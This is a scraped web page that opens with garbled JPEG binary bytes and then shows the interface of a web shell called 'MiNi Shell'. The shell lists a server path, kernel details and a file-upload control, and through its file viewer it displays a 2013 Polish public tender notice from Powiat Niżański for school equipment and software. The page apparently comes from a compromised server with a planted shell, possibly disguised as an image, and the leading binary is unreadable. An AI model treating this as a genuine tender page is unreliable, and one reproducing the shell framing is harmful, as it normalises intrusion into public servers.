JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130822/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130822/339376-N-2013.html

<p class="kh_header"><b>Nisko: Dostawa pomocy dydaktycznych oraz oprogramowań na potrzeby wyposażenia pracowni: organizowania i  prowadzenia sprzedaży, techniki biurowej oraz pracowni ekonomiki i rachunkowości handlowej w ramach projektu pn.: Podkarpacie stawia na zawodowców, którego Partnerem jest Powiat Niżański, realizowanego w ramach Europejskiego Funduszu Społecznego, Priorytet IX, Działanie 9.2 Podniesienie jakości i atrakcyjności szkolnictwa zawodowego.</b><br>
<b>Numer ogłoszenia: 339376 - 2013; data zamieszczenia: 22.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Niżański , Pl. Wolności 2, 37-400 Nisko, woj. podkarpackie, tel. 015 8412057, faks 015 8412700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-nisko.pl,  poczta@powiat-nisko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa pomocy dydaktycznych oraz oprogramowań na potrzeby wyposażenia pracowni: organizowania i  prowadzenia sprzedaży, techniki biurowej oraz pracowni ekonomiki i rachunkowości handlowej w ramach projektu pn.: Podkarpacie stawia na zawodowców, którego Partnerem jest Powiat Niżański, realizowanego w ramach Europejskiego Funduszu Społecznego, Priorytet IX, Działanie 9.2 Podniesienie jakości i atrakcyjności szkolnictwa zawodowego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa pomocy dydaktycznych oraz oprogramowań na potrzeby wyposażenia pracowni: organizowania i prowadzenia sprzedaży, techniki biurowej oraz pracowni ekonomiki i rachunkowości handlowej w ramach projektu pn.: Podkarpacie stawia na zawodowców, którego Partnerem jest Powiat Niżański, realizowanego w ramach Europejskiego Funduszu Społecznego, Priorytet IX, Działanie 9.2 Podniesienie jakości i atrakcyjności szkolnictwa zawodowego. 
Wszystkie parametry wymienionych przedmiotów podane są jako minimalne.
Część 1: Dostawa pomocy dydaktycznych na potrzeby wyposażenia pracowni organizowania i prowadzenia sprzedaży oraz techniki biurowej
Lp.
Nazwa  i opis przedmiotu
Jednostka miary
ilość
Pracownia organizowania i prowadzenia sprzedaży
1.
Drukarka laserowa kolorowa:
format drukarki A4
rozdzielczość w czerni 2400x600 dpi
rozdzielczość w kolorze 2400x600 dpi
druk dwustronny
gwarancja 24 miesiące, instrukcja w języku polskim
sztuka
1
2.
Skaner płaski
źródło światła LED
rozdzielczość 1200x2400 dpi
format skanowania (maksymalny) A4
gwarancja 24 miesiące,  instrukcja w języku polskim
sztuka
1
3.
Projektor multimedialny
gwarancja 24 miesiące, instrukcja w języku polskim
sztuka
1
4. 
Urządzenie do rejestracji sprzedaży (kasa fiskalna)
liczba towarów - powyżej 2000
liczba stawek PTU - minimum 7
liczba grup towarowych - minimum 40
liczba kasjerów - minimum 5
mechanizm drukujący - termiczny
klawiatura alfanumeryczna 
wyświetlacz dla klienta/kasjer alfanumeryczny, podświetlany LCD
współpraca z komputerem , czytnikiem, wagą 
zasilanie sieciowe wraz z  awaryjnym, wbudowanym akumulatorem
gwarancja 24 miesiące,  instrukcja w języku polskim
sztuka
6
Pracownia techniki biurowej
1.
Telefon z automatyczną sekretarką i faxem technologia wydruku- termotransfer
papier zwykły
identyfikacja numerów
cyfrowy automat zgłoszeniowy z minimum 10 min,  czasem nagrywania
książka telefoniczna o pojemności minimum 100 pozycji
menu w języku polskim
gwarancja 24 miesiące, instrukcja w języku polskim
sztuka
6
2.
Urządzenie wielofunkcyjne (skaner, drukarka i kserokopiarka) 
laserowa , kolorowa
rozdzielczość w czerni 600x2400 dpi
rozdzielczość w kolorze 600x2400 dpi
rozdzielczość optyczna  skanera 1200x2400 dpi
maksymalny format skanowania A4
rozdzielczość kopiowania 600x600 dpi
zmniejszenie powiększenie 25-400%
złącze USB 2.0  i Ethernet
panel sterowania
praca w sieci 
gwarancja 24 miesiące,  instrukcja w języku polskim
sztuka
1
3.
Niszczarka 
ilość kartek niszczonych jednorazowo (A4): minimum 10
rodzaj cięcia: ścinki
automatyczny start/stop: fotokomórka
funkcja cofania
możliwość niszczenia dokumentów ze zszywkami i małymi spinaczami biurowymi
sztuka
1
4.
Dyktafon 
pamięć 4 GB
mikrofon stereofoniczny
wyświetlacz LCD czarno-biały podświetlany
czas nagrywania - minimum 1000 min.
aktywacja głosem
odtwarzanie plików MP3
regulacja prędkości odtwarzania
wbudowany głośnik
wbudowany zegar i datownik 
gniazdo słuchawek 
gniazdo mikrofonowe
połączenie z komputerem  USB 2.0
zasilanie 1 bateria AAA lub akumulator AAA
instrukcja w języku polskim
kabel USB
1 bateria AAA
gwarancja 24 miesiące,  instrukcja w języku polskim
sztuka
2
5.
Otwieraczka do listów 
koperty				
długość: min. 85 mm, max 175 mm
szerokość: min. 140 mm, max 260 mm
grubość: max 4 mm
gwarancja 24 miesiące,  instrukcja w języku polskim
sztuka
1
6.
Falcerka do składania papieru 
Ręczne podawanie papieru do falcerki
format A4
zasilanie sieciowe
kartka składana na 3 - format dopasowany do koperty lub broszury DL
gwarancja 24 miesiące,  instrukcja w języku polskim
sztuka
1
Część 2: Dostawa oprogramowań na potrzeby wyposażenia pracowni: organizowania i prowadzenia sprzedaży, techniki biurowej oraz pracowni ekonomiki i rachunkowości handlowej.
Oprogramowanie będzie użytkowane przez szkołę: Zespół Szkół im gen. Władysława Sikorskiego w Rudniku nad Sanem. 
Warunki (dotyczy część 2):
1. programy mają być aktualnie stosowane w działalności handlowej
2. instrukcja w języku polskim.
Lp.
Nazwa  i opis przedmiotu
Jednostka miary
Ilość stanowisk
Pracownia organizowania i prowadzenia sprzedaży
1.
Pakiet programów biurowych 
Licencje na najnowsze stabilne oprogramowanie biurowe dla szkół, spełniający następujące kryteria:
zawierający:
-   procesor tekstu,
-   arkusz kalkulacyjny,
-   program do prezentacji,
-   program pocztowy,
w pełni wspierające formaty plików .doc, .docx, .xsl, .xlsx, .ppt, .pptx,
pozwalające na tworzenie i uruchamianie makr Visual Basic
interfejs w języku polskim,
obsługa sprawdzania pisowni w języku polskim,
licencja bezterminowa z możliwością przenoszenia pomiędzy stacjami roboczymi.
licencje
15
2.
Oprogramowanie do obsługi sprzedaży i gospodarki magazynowej
licencje
15
Pracownia techniki biurowej
1
Pakiet programów biurowych 
Licencje na najnowsze stabilne oprogramowanie biurowe dla szkół, spełniający następujące kryteria:
zawierający: 
-   procesor tekstu,
-   arkusz kalkulacyjny,
-   program do prezentacji,
-   program pocztowy,
w pełni wspierające formaty plików .doc, .docx, .xsl, .xlsx, .ppt, .pptx,
pozwalające na tworzenie i uruchamianie makr Visual Basic
interfejs w języku polskim,
obsługa sprawdzania pisowni w języku polskim,
licencja bezterminowa z możliwością przenoszenia pomiędzy stacjami roboczymi.
licencja
15

Wyposażenie pracowni ekonomiki i rachunkowości handlowej 
1
Pakiet programów biurowych 
Licencje na najnowsze stabilne oprogramowanie biurowe dla szkół, spełniający następujące kryteria:
zawierający: 
-   procesor tekstu,
-   arkusz kalkulacyjny,
-   program do prezentacji,
-   program pocztowy,
w pełni wspierające formaty plików .doc, .docx, .xsl, .xlsx, .ppt, .pptx,
pozwalające na tworzenie i uruchamianie makr Visual Basic
interfejs w języku polskim,
obsługa sprawdzania pisowni w języku polskim,
licencja bezterminowa z możliwością przenoszenia pomiędzy stacjami roboczymi.
licencja
15
2
Programowanie do wspomagania operacji finansowo-księgowych
licencje
15
3
Oprogramowanie do obsługi sprzedaży i gospodarki magazynowej
licencje
15
4
Oprogramowanie kadrowo-płacowe
licencje
15
5
Oprogramowanie do prowadzenia księgi przychodów i rozchodów
licencje
15
6
Oprogramowanie do obliczania podatków i sporządzania sprawozdań statystycznych
licencje
15
7
Oprogramowanie do obsługi zobowiązań wobec ZUS i US
licencje
15
W przypadku gdy zamawiający dokonał opisu przedmiotu zamówienia w SIWZ przez wskazanie przykładowych znaków towarowych lub pochodzenia, wykonawcy mogą zaoferować materiały równoważne o parametrach tego typu, lecz nie gorszych od wskazanych. Materiały równoważne muszą być w ofercie wymienione z nazwy, a ciężar udowodnienia o zachowaniu parametrów wymaganych przez zamawiającego leży po stronie składającego ofertę.

W przypadku dostarczenia oprogramowania równoważnego względem wyspecyfikowanych przez Zamawiającego w SIWZ, Wykonawca musi na swoją odpowiedzialność i swój koszt udowodnić, że dostarczone produkty spełniają wszystkie wymagania i warunki określone w SIWZ, w szczególności w zakresie:
1) warunki licencji, sublicencji w każdym aspekcie licencjonowania, sublicencjonowania, które nie mogą być gorsze niż dla produktu wymienionego w SIWZ,
2)	funkcjonalności równoważnej produktu, która nie może być gorsza od funkcjonalności produktu wymienionego w SIWZ,
3)	warunków i zakresu usług gwarancji, serwisu pogwarancyjnego, asysty technicznej i konserwacji produktu równoważnego, muszą być nie gorsze niż dla produktu wymienionego	w SIWZ.
W przypadku gdy zaoferowany przez Wykonawcę produkt równoważny nie będzie właściwie współdziałać ze sprzętem i oprogramowaniem funkcjonującym u Zamawiającego i lub spowoduje zakłócenia w funkcjonowaniu pracy środowiska sprzętowo-programowego u Zamawiającego, Wykonawca pokryje wszystkie koszty związane z przywróceniem i sprawnym działaniem infrastruktury sprzętowo-programowej Zamawiającego oraz na własny koszt dokona niezbędnych modyfikacji przywracających właściwe działanie środowiska sprzętowo - programowego Zamawiającego również po usunięciu produktu równoważnego.
Wraz z produktem równoważnym Wykonawca jest zobowiązany do dostarczenia niżej wymienionego oświadczenia i następujących dokumentów:
1) oświadczenia dotyczącego zastosowania produktu równoważnego,
2) pełnego postanowienia licencji sublicencji produktu równoważnego,
3) pełnego wykazu funkcjonalności produktu równoważnego,
4) pełnych warunków i zasad świadczenia usług gwarancji, serwisu pogwarancyjnego, asysty technicznej i konserwacji dla produktu równoważnego.
Oprogramowanie równoważne zastosowane przez Wykonawcę nie może w momencie składania przez niego oferty mieć statusu zakończenia wsparcia technicznego producenta. Niedopuszczalne jest zastosowanie oprogramowania równoważnego, dla którego producent ogłosił zakończenie jego rozwoju w terminie 3 lat licząc od momentu złożenia oferty. Niedopuszczalne jest użycie oprogramowania równoważnego, dla którego producent oprogramowania współpracującego ogłosił zaprzestanie wsparcia w jego nowszych wersjach..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.10-9, 30.21.31.00-6, 48.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie spełnienia których Wykonawca składa oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 pkt 1 (załącznik nr 2 do SIWZ),</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie posiadania wiedzy  i doświadczenia Wykonawca składa oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 pkt 2 (załącznik nr 2 do SIWZ),</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie posiadania wiedzy  i doświadczenia Wykonawca składa oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 pkt 2 (załącznik nr 2 do SIWZ),</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie posiadania wiedzy  i doświadczenia Wykonawca składa oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 pkt 2 (załącznik nr 2 do SIWZ),</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie posiadania wiedzy  i doświadczenia Wykonawca składa oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 pkt 2 (załącznik nr 2 do SIWZ),</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy (Załącznik nr 1 do SIWZ wraz z załącznikiem A i B), 2. W przypadku gdy Wykonawcę reprezentuje pełnomocnik do oferty winno być załączone pełnomocnictwo posiadające zakres uprawnień i podpisane przez osoby uprawnione do reprezentowania Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne są następujące przypadki  i warunki zmiany umowy:
- .zmniejszenie zakresu przedmiotu zamówienia gdy jego wykonanie w pierwotnym zakresie nie leży w interesie Zamawiającego w granicach uzasadnionego interesu	Zamawiającego,
- zmiany terminu realizacji przedmiotu zamówienia, w przypadku:
gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego w zakresie uzasadnionego interesu  Zamawiającego,
- wystąpienia zdarzeń siły wyższej jako zdarzenia zewnętrznego, niemożliwego  do przewidzenia i niemożliwego do zapobieżenia,
- zaistnienia okoliczności (technicznych, gospodarczych itp.) których nie można było przewidzieć chwili zawarcia umowy,. konieczności zmiany osób przewidzianych do wykonania przedmiotu umowy,
- wprowadzenia nowej technologii lub innych okoliczności pozwalających na obniżenie ceny przedmiotu umowy, Wykonawca może ją odpowiednio obniżyć,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat-nisko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Nisku, Plac Wolności 2, 37-400 Nisko - Wydział Gospodarki Mieniem Powiatu.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.08.2013 godzina 10:45, miejsce: Starostwo Powiatowe w Nisku, Plac Wolności 2, 37-400 Nisko - Biuro Obsługi Interesanta (pokój Nr 1).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przetargu nieograniczonego na zadanie pn.: Dostawa pomocy dydaktycznych oraz oprogramowań na potrzeby wyposażenia pracowni: organizowania i prowadzenia sprzedaży, techniki biurowej oraz pracowni ekonomiki i rachunkowości handlowej w ramach projektu pn.: Podkarpacie stawia na zawodowców, którego Partnerem jest Powiat Niżański, realizowanego w ramach Europejskiego Funduszu Społecznego, Priorytet IX, Działanie 9.2 Podniesienie jakości i atrakcyjności szkolnictwa zawodowego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com